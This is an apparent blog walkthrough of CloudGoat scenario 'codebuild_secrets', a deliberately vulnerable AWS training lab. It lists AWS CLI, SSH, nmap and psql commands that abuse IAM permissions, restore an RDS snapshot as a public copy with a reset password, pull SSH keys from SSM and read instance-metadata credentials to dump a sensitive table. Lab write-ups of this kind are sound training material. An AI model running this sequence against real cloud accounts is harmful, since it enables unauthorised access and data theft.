Cloudgoat AWS CTF solution- Scenerio 9 (codebuild_secrets)

Scenerio 9- codebuild_secrets

git clone
cd cloudgoat
chmod +x
./ config whitelist --auto
./ create codebuild_secrets

Scenario Resources

  • RDS x 1
  • EC2 x 1

Scenario Start(s)

Scenario Goal(s)


Exploitation Route(s)

Walkthrough — Calrissian via RDS Snapshot

  1. As the IAM User Solo, the attacker explores the AWS environment and enumerates its permissions, and discovers they are able to list CodeBuild projects.
aws codebuild list-projects --profile solo
aws codebuild batch-get-projects --names cg-codebuild-codebuild_secrets_cgidnmff3ngu3y --profile solo
aws rds create-db-snapshot --db-instance-identifier cg-rds-instance-codebuild-secrets-cgidnmff3ngu3y --db-snapshot-identifier cloudgoat --profile calrissian
aws rds describe-db-subnet-groups --profile calrissian
aws ec2 describe-security-groups --profile calrissian
aws rds restore-db-instance-from-db-snapshot --db-instance-identifier copy-of-old --db-snapshot-identifier cloudgoat --db-subnet-group-name cloud-goat-rds-testing-subnet-group-codebuild_secrets_cgidnmff3ngu3y --publicly-accessible --vpc-security-group-ids sg-03bb0912657c162f0 --profile calrissian
aws rds describe-db-instances --profile calrissian
aws rds modify-db-instance --db-instance-identifier copy-of-old --master-user-password cloudgoat --profile calrissian
nmap -Pn --disable-arp-ping -n -vv -sS -p5432
psql -h -U cgadmin -d postgres
#list available databases
#change to database
\c securedb
#list tables
select * from sensitive_information;

Walkthrough — Solo via EC2 Metadata service

  1. As solo user iam-enumerate tool was unable to determine ssm permissions but upon manually checking solo’s permissions we can see we have ssm:DescribeParameters and ssm:GetParameter permissions.
aws ssm describe-parameters --profile solo
  1. In the account’s SSM parameters, we found a pair of SSH keys stored without any encryption.
aws ssm get-parameter --name cg-ec2-private-key-codebuild_secrets_cgidnmff3ngu3y --profile solo
echo -e <ssh_key_without_newlines> > ssh_key_private.out
chmod 400 ssh_key_private.out
aws ec2 describe-instances --profile solo
ssh -i ssh_key_private.out ubuntu@

Branch A

  1. Now working with shell access, we can query the EC2 metadata service and discover the instance-profile’s IAM keys, and log in using ec2’s role.
aws lambda list-functions --profile ec2_role
aws rds describe-db-instances --profile ec2_role
psql -h -U cgadmin -d securedb

Branch B

  1. Now working with shell access, the we query the EC2 metadata service and discover that the database address is stored there, along with admin credentials-
psql postgresql://
psql -h -U cgadmin -d securedb#listing tables
select * from sensitive_information;



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store